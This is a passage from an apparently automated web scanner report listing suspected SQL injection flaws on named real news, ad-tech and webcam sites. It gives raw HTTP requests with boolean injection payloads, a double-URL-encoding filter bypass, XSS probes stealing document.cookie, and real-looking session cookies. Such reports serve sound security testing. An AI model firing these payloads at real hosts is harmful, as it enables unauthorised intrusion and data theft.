User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:04 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1245

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><TR><TH width="40%" class="TSN6" align="left">1/28 10:30 PM ET</th><TH width="10%" class="TSN2" align="center">1</th><TH
...[SNIP]...

1.23. http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx [team parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scores.heraldinteractive.com
Path:   /aspdata/clients/herald/nflgame.aspx

Issue detail

The team parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the team parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aspdata/clients/herald/nflgame.aspx?team=077' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:08 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8709

<html>
<head>
<title>Unclosed quotation mark before the character string '077''.<br>Line 1: Incorrect syntax near '077''.</title>
<style>
body {font-family:"Verdana";f
...[SNIP]...

Request 2

GET /aspdata/clients/herald/nflgame.aspx?team=077'' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:09 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1814

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><tr><TH width="40%" class="TSN6" align="left">Final </th><TH width="10%" align="center" Class="TSN2">1</th><TH width="10%
...[SNIP]...

1.24. http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx [team parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scores.heraldinteractive.com
Path:   /aspdata/clients/herald/nhlgame.aspx

Issue detail

The team parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the team parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aspdata/clients/herald/nhlgame.aspx?team=121' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:17 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8732

<html>
<head>
<title>Unclosed quotation mark before the character string '121',1'.<br>Line 1: Incorrect syntax near '121',1'.</title>
<style>
body {font-family:"Verdan
...[SNIP]...

Request 2

GET /aspdata/clients/herald/nhlgame.aspx?team=121'' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:19 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1659

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><tr><TH width="40%" class="TSN6" align="left">Final </th><TH width="10%" align="center" Class="TSN2">1</th><TH width="10%
...[SNIP]...

1.25. http://tap.rubiconproject.com/oz/sensor [au cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The au cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the au cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5804/7477&cd=false&xt=17&k=photos:102,5+wrinkle:64,daily+news:64,wrinkle+trick:64,77+hr:64,dallas+mom's:64,mom's+5:64,dallas+local:64,makes+77:64,mom+makes:64,local+mom:64,photo:55,dallas:48,news:42,stars:32,dallas+mom:32,look+phenomenal:32,caught+without:32,without+makeup:32,stars+caught:32,player+news:32,life+style:32,news+front:32,red+carpet:32,daily+new:32,mom+make:32,star:26,2011:24,high+school:24,honored+tradition:24,sundance+film:24,film+festival:24,festival+2011:24,time+honored:24,dalla:24,sunny+socal:24,stars+leave:24,leave+sunny:24,2011+daily:24,new:21,&rd=burp&t=Page+Not+Found HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239'%20and%201%3d1--%20; put_1197=3271971346728586924; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; cd=false; dq=14|4|10|0; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; rdk15=0; ses15=7477^6; csi15=3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_1185=3011330574290390485; rdk=5804/7477; rdk2=0; ses2=7477^6; csi2=3138805.js^2^1296224077^1296226130&3174527.js^2^1296226121^1296226125&3178295.js^1^1296226112^1296226112; put_1986=4760492999213801733; rpb=4214%3D1%264894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1; put_2132=D8DB51BF08484217F5D14AB47F4002AD

Response 1

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:02:01 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:02:01 GMT; Path=/
Set-Cookie: dq=15|4|11|0; Expires=Sat, 28-Jan-2012 17:02:01 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5804/7477&cd=false&xt=17&k=photos:102,5+wrinkle:64,daily+news:64,wrinkle+trick:64,77+hr:64,dallas+mom's:64,mom's+5:64,dallas+local:64,makes+77:64,mom+makes:64,local+mom:64,photo:55,dallas:48,news:42,stars:32,dallas+mom:32,look+phenomenal:32,caught+without:32,without+makeup:32,stars+caught:32,player+news:32,life+style:32,news+front:32,red+carpet:32,daily+new:32,mom+make:32,star:26,2011:24,high+school:24,honored+tradition:24,sundance+film:24,film+festival:24,festival+2011:24,time+honored:24,dalla:24,sunny+socal:24,stars+leave:24,leave+sunny:24,2011+daily:24,new:21,&rd=burp&t=Page+Not+Found HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239'%20and%201%3d2--%20; put_1197=3271971346728586924; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; cd=false; dq=14|4|10|0; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; rdk15=0; ses15=7477^6; csi15=3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_1185=3011330574290390485; rdk=5804/7477; rdk2=0; ses2=7477^6; csi2=3138805.js^2^1296224077^1296226130&3174527.js^2^1296226121^1296226125&3178295.js^1^1296226112^1296226112; put_1986=4760492999213801733; rpb=4214%3D1%264894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1; put_2132=D8DB51BF08484217F5D14AB47F4002AD

Response 2

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:02:01 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.26. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19372086%20or%201%3d1--%20 and 19372086%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5804/7477&cd=false&xt=15&k=photos:102,daily+news:64,photo:55,news:42,red+carpet:32,news+front:32,life+style:32,stars:32,daily+new:32,player+news:32,stars+caught:32,without+makeup:32,caught+without:32,look+phenomenal:32,star:26,2011+daily:24,leave+sunny:24,stars+leave:24,2011:24,high+school:24,time+honored:24,festival+2011:24,film+festival:24,sundance+film:24,sunny+socal:24,honored+tradition:24,new:21,submit:20,daily:20,sports:20,blogs:18,celebrity:16,world:16,errorpage:16,columnists:14,fashion:14,celebs:14,time:14,blog:13,caught:12,&rd=burp&t=Page+Not+Found&119372086%20or%201%3d1--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; put_1994=6ch47d7o8wtv; cd=false; dq=11|2|9|0; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; ses15=7477^2; csi15=3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rdk=5804/7477; ses2=7477^2; csi2=3138805.js^1^1296224077^1296224077; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb

Response 1

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:02:09 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:02:10 GMT; Path=/
Set-Cookie: dq=12|2|10|0; Expires=Sat, 28-Jan-2012 17:02:10 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5804/7477&cd=false&xt=15&k=photos:102,daily+news:64,photo:55,news:42,red+carpet:32,news+front:32,life+style:32,stars:32,daily+new:32,player+news:32,stars+caught:32,without+makeup:32,caught+without:32,look+phenomenal:32,star:26,2011+daily:24,leave+sunny:24,stars+leave:24,2011:24,high+school:24,time+honored:24,festival+2011:24,film+festival:24,sundance+film:24,sunny+socal:24,honored+tradition:24,new:21,submit:20,daily:20,sports:20,blogs:18,celebrity:16,world:16,errorpage:16,columnists:14,fashion:14,celebs:14,time:14,blog:13,caught:12,&rd=burp&t=Page+Not+Found&119372086%20or%201%3d2--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; put_1994=6ch47d7o8wtv; cd=false; dq=11|2|9|0; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; ses15=7477^2; csi15=3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rdk=5804/7477; ses2=7477^2; csi2=3138805.js^1^1296224077^1296224077; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb

Response 2

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:02:10 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.27. http://tap.rubiconproject.com/oz/sensor [pc parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The pc parameter appears to be vulnerable to SQL injection attacks. The payloads 20312360'%20or%201%3d1--%20 and 20312360'%20or%201%3d2--%20 were each submitted in the pc parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5804/747720312360'%20or%201%3d1--%20&cd=false&xt=15&k=photos:102,daily+news:64,photo:55,news:42,red+carpet:32,news+front:32,life+style:32,stars:32,daily+new:32,player+news:32,stars+caught:32,without+makeup:32,caught+without:32,look+phenomenal:32,star:26,2011+daily:24,leave+sunny:24,stars+leave:24,2011:24,high+school:24,time+honored:24,festival+2011:24,film+festival:24,sundance+film:24,sunny+socal:24,honored+tradition:24,new:21,submit:20,daily:20,sports:20,blogs:18,celebrity:16,world:16,errorpage:16,columnists:14,fashion:14,celebs:14,time:14,blog:13,caught:12,&rd=burp&t=Page+Not+Found HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; put_1994=6ch47d7o8wtv; cd=false; dq=11|2|9|0; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; ses15=7477^2; csi15=3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rdk=5804/7477; ses2=7477^2; csi2=3138805.js^1^1296224077^1296224077; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb

Response 1

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:01:38 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:01:38 GMT; Path=/
Set-Cookie: dq=12|2|10|0; Expires=Sat, 28-Jan-2012 17:01:38 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5804/747720312360'%20or%201%3d2--%20&cd=false&xt=15&k=photos:102,daily+news:64,photo:55,news:42,red+carpet:32,news+front:32,life+style:32,stars:32,daily+new:32,player+news:32,stars+caught:32,without+makeup:32,caught+without:32,look+phenomenal:32,star:26,2011+daily:24,leave+sunny:24,stars+leave:24,2011:24,high+school:24,time+honored:24,festival+2011:24,film+festival:24,sundance+film:24,sunny+socal:24,honored+tradition:24,new:21,submit:20,daily:20,sports:20,blogs:18,celebrity:16,world:16,errorpage:16,columnists:14,fashion:14,celebs:14,time:14,blog:13,caught:12,&rd=burp&t=Page+Not+Found HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; put_1994=6ch47d7o8wtv; cd=false; dq=11|2|9|0; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; ses15=7477^2; csi15=3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rdk=5804/7477; ses2=7477^2; csi2=3138805.js^1^1296224077^1296224077; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb

Response 2

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:01:38 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.28. http://tr.imlive.com/waccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tr.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:47 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTRBSD=FAKPGKMALJJINONJKHHPMGGB; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:47 GMT
Connection: close
Content-Length: 8333
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.29. http://tr.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tr.imlive.com
Path:   /waccess/

Issue detail

